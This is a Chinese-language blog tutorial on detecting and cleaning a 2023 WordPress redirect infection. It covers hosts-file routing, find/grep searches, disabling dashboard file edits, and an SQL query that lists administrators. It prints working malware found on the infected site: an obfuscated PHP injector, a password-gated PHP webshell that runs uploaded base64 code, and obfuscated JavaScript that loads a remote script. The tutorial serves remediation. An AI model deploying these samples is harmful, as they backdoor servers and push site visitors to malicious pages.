Fix Redirect WordPress Hack 2023（重定向病毒）

WordPress 它绝对是最常用的平台 CMS (Content Management System) 对于博客和入门在线商店（使用模块 WooCommerce），这使其成为计算机攻击（黑客攻击）的最大目标。 最常用的黑客操作之一旨在将受感染的网站重定向到其他网页。 Redirect WordPress Hack 2023 是一种相对较新的恶意软件，其影响是将整个网站重定向到垃圾邮件网页，或者进而感染用户的计算机。

如果您的网站开发于 WordPress 如果被重定向到另一个站点，那么它很可能是已经著名的重定向黑客的受害者。

在本教程中，您将找到必要的信息和有用的提示，通过它们可以对受重定向感染的网站进行反病毒处理 WordPress Hack (Virus Redirect)。 通过评论您可以获得更多信息或寻求帮助。

检测重定向站点的病毒 WordPress

网站流量突然且不合理地减少、订单数量减少（对于在线商店）或广告收入减少是出现问题的第一个迹象。 检测“Redirect WordPress Hack 2023当您打开网站并将您重定向到另一个网页时，也可以“直观地”完成（病毒重定向）。

根据经验，大多数网络恶意软件都与互联网浏览器兼容： Chrome, Firefox, Edge, Opera。 如果您是电脑用户 Mac，这些病毒在浏览器中并不真正可见 Safari。 安全系统来自 Safari 默默地阻止这些恶意脚本。

如果您的网站被感染该怎么办 Redirect WordPress Hack

我希望第一步不要惊慌或删除该网站。 即使是受感染或病毒文件，一开始也不应删除。 它们包含有价值的信息，可以帮助您了解安全漏洞的位置以及病毒的影响因素。 作案手法。

向公众关闭网站。

如何向访问者关闭病毒网站？ 最简单的方法是使用 DNS 管理器并删除“A”（域名）的 IP 或定义一个不存在的 IP。 因此，网站访问者将受到保护。 redirect WordPress hack 这可能会导致他们访问病毒或垃圾邮件网页。

如果你使用 CloudFlare 作为 DNS 管理员，您登录帐户并删除 DNS 记录”A” 为域名。 因此，受病毒影响的域将仍然没有 IP，无法再从 Internet 访问。

您复制网站的 IP 并“路由”它，以便只有您可以访问它。 从您的计算机。

如何更改电脑网站的真实IP Windows?

该方法通常用于通过编辑“hosts”文件来阻止对某些网站的访问。

1.你打开 Notepad 或其他文本编辑器（具有权限 administrator）并编辑文件“hosts”。 它位于：

C:\Windows\System32\drivers\etc\hosts

2. 在“hosts”文件中，添加“route”到您网站的真实IP。 上面从 DNS 管理器中删除了 IP。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. 保存文件并在浏览器中访问网站。

如果网站无法打开，并且您在“hosts”文件中没有做任何错误，则很可能是 DNS 缓存造成的。

清除操作系统上的 DNS 缓存 Windows， 打开 Command Prompt，在其中运行命令：

ipconfig /flushdns

如何更改电脑网站的真实IP Mac / Mac书？

对于电脑用户 Mac 更改网站的真实IP要简单一些。

1. 打开实用程序 Terminal.

2.运行命令行（需要系统密码才能运行）：

sudo nano /etc/hosts

3. 与计算机相同 Windows，添加域名的真实IP。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. 保存更改。 Ctrl+X (y).

“路由”后，您是唯一可以通过以下方式访问受感染网站的人： Redirect WordPress Hack.

完整网站备份 – 文件和数据库

就算是感染了“redirect WordPress hack”，建议对整个网站进行一般备份。 文件和数据库。 也许您还可以保存这两个文件的本地副本 public / public_html 以及数据库。

识别受感染的文件和被修改的文件 Redirect WordPress Hack 2023

主要目标文件 WordPress 必须遵守 index.php （在根中）， header.php, index.php 对 footer.php 主题的 WordPress 资产。 手动检查这些文件并识别恶意代码或恶意软件脚本。

2023年，一种病毒“Redirect WordPress Hack” 放入 index.php 形式的代码：

（我不建议运行这些代码！）

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

解码后，这个 恶意脚本 这基本上是网站被感染的结果 WordPress。 它不是恶意软件背后的脚本，而是可以重定向受感染网页的脚本。 如果我们解码上面的脚本，我们会得到：

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

要识别服务器上包含此代码的所有文件，最好具有访问权限 SSH 到服务器上运行文件检查和管理命令行 Linux.

相关新闻： 如何确定您的博客是否被感染，求助 Google Search 。 （WordPress 病毒）

下面的两个命令绝对有助于识别最近修改的文件和包含特定代码（字符串）的文件。

你怎么看 Linux PHP 文件在过去 24 小时或其他时间范围内发生了更改？

命令 ”find”使用起来非常简单，并允许自定义设置时间段、搜索路径和文件类型。

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

在输出中，您将收到有关文件修改日期和时间、写/读/执行权限（chmod）以及它属于哪个组/用户。

如果您想检查更多天前，请更改值“-mtime -1”或使用“-mmin -360”几分钟（6 小时）。

如何在PHP、Java文件中搜索代码（字符串）？

“查找”命令行可以让你快速查找包含特定代码的所有 PHP 或 Java 文件，如下所示：

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

该命令将搜索并显示文件 .php 对 .js 含有“uJjBRODYsU“。

借助上面两个命令，您将非常容易地找出哪些文件最近被修改以及哪些文件包含恶意软件代码。

从修改的文件中删除恶意代码，而不影响正确的代码。 在我的场景中，恶意软件是在打开之前放置的 <head>.

当执行第一个“find”命令时，很有可能在服务器上发现不属于您的新文件 WordPress 也不由你放在那里。 属于病毒类型的文件 Redirect WordPress Hack.

在我调查的场景中，“wp-log-nOXdgD.php”。 这些是“生成”文件，还包含病毒用于重定向的恶意软件代码。

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

类型文件的用途“wp-log-*”的目的是将重定向黑客病毒传播到服务器上托管的其他网站。 这是一种“webshell” 组成一个 基础部分 （其中定义了一些加密变量）和o 执行部分 攻击者试图通过它在系统上加载并执行恶意代码。

如果有一个变量 POST 名为'bh' 及其加密值 MD5 等于“8f1f964a4b4d8d1ac3f0386693d28d03”，然后脚本出现写入加密内容 base64 另一个名为 ' 的变量b3' 在临时文件中，然后尝试包含此临时文件。

如果有一个变量 POST 或 GET 名为'tick'，脚本将响应该值 MD5 字符串“885“。

要识别服务器上包含此代码的所有文件，请选择一个常见的字符串，然后运行命令“find”（与上面的类似）。 删除包含此恶意软件代码的所有文件.

安全漏洞被利用 Redirect WordPress Hack

该重定向病毒很可能通过 利用管理用户 WordPress 或通过识别 易受攻击的插件 它允许添加具有以下权限的用户 administrator.

对于大多数在该平台上构建的网站 WordPress 有可能的 编辑主题或插件文件从管理界面（Dashboard）。 因此，恶意者可以将恶意软件代码添加到主题文件中以生成上面所示的脚本。

此类恶意软件代码的示例如下：

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript 在主题标题中标识 WordPress, 打开标签后立即 <head>.

破译此 JavaScript 相当困难，但很明显，它会查询另一个网址，最有可能从该网址获取其他脚本来创建文件”wp-log-*我在上面谈到过。

从所有文件中查找并删除此代码 PHP 做作的。

据我所知，这段代码是 手动添加 由具有管理权限的新用户。

因此，为了防止从仪表板添加恶意软件，最好禁用编辑选项 WordPress 仪表板中的主题/插件。

编辑文件 wp-config.php 并添加以下行：

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

进行此更改后，没有用户 WordPress 您将无法再从仪表板编辑文件。

检查角色为的用户 Administrator

下面是一个 SQL 查询，您可以使用它来搜索具有以下角色的用户 administrator 在平台中 WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

该查询将返回表中的所有用户 wp_users 谁分配了角色 administrator。 查询也针对表完成 wp_usermeta 在元中搜索'wp_capabilities'，其中包含有关用户角色的信息。

另一种方法是通过以下方式识别它们： Dashboard → Users → All Users → Administrator。 但是，有些做法可以将用户隐藏在仪表板面板中。 所以，看到用户的最好方式”Administrator“以 WordPress 就是上面的SQL命令。

就我而言，我在数据库中识别出名为“的用户”wp-import-user”。 很有启发性。

您还可以从这里看到用户的日期和时间 WordPress 被创建。 用户 ID 也非常重要，因为它会搜索服务器日志。 这样您就可以看到该用户的所有活动。

删除角色为的用户 administrator 那么你不知道 更改密码 给所有管理用户。 编辑、作者、 Administrator.

修改SQL数据库用户密码 受影响的网站。

采取这些步骤后，可以为所有用户重新启动网站。

但请记住，我上面介绍的可能是网站被感染的数千种情况之一 Redirect WordPress Hack 在2023年。

如果您的网站已被感染并且需要帮助或有任何疑问，请开放评论部分。